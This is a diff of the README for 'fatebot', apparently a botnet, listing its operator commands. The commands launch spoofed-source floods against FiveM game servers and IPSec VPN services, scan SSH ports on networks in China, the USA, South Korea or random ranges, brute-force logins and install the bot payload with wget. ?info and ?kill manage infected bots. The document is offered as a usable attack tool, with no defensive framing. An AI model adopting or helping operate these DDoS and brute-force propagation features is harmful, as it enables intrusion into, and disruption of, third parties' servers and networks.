m4pol/fatebot/README.md

 		?fms 	 <srcIP> <dstIP>				Flood query payload to a FiveM game server(They use to host GTAV i guess. i'm only playing "Hell let loose" for now, lol).
 		?ipsec 	 <srcIP> <dstIP>				Flood payload to overwhelm system resources of VPN service and make IPSec VPN connections being affected.

-	?scan 	 <modes> <ftp>				Scan SSH port on the network, Brute-Force attack to the target and install the payload by "wget".
+	SCANNER:

-	Scanner modes:
+		?scan 	 <modes> <server>                       	Scan SSH port on the network, Brute-Force attack to the target and install the payload by "wget".

 			-cn		Scan on china network.
 			-usa		Scan on the united state of america network.
 			-kr		Scan on south korea network.
 			-r		Scan with random ip.

 	?info				Get bot system information, for bot analysis.
 	?kill				Bot self-close.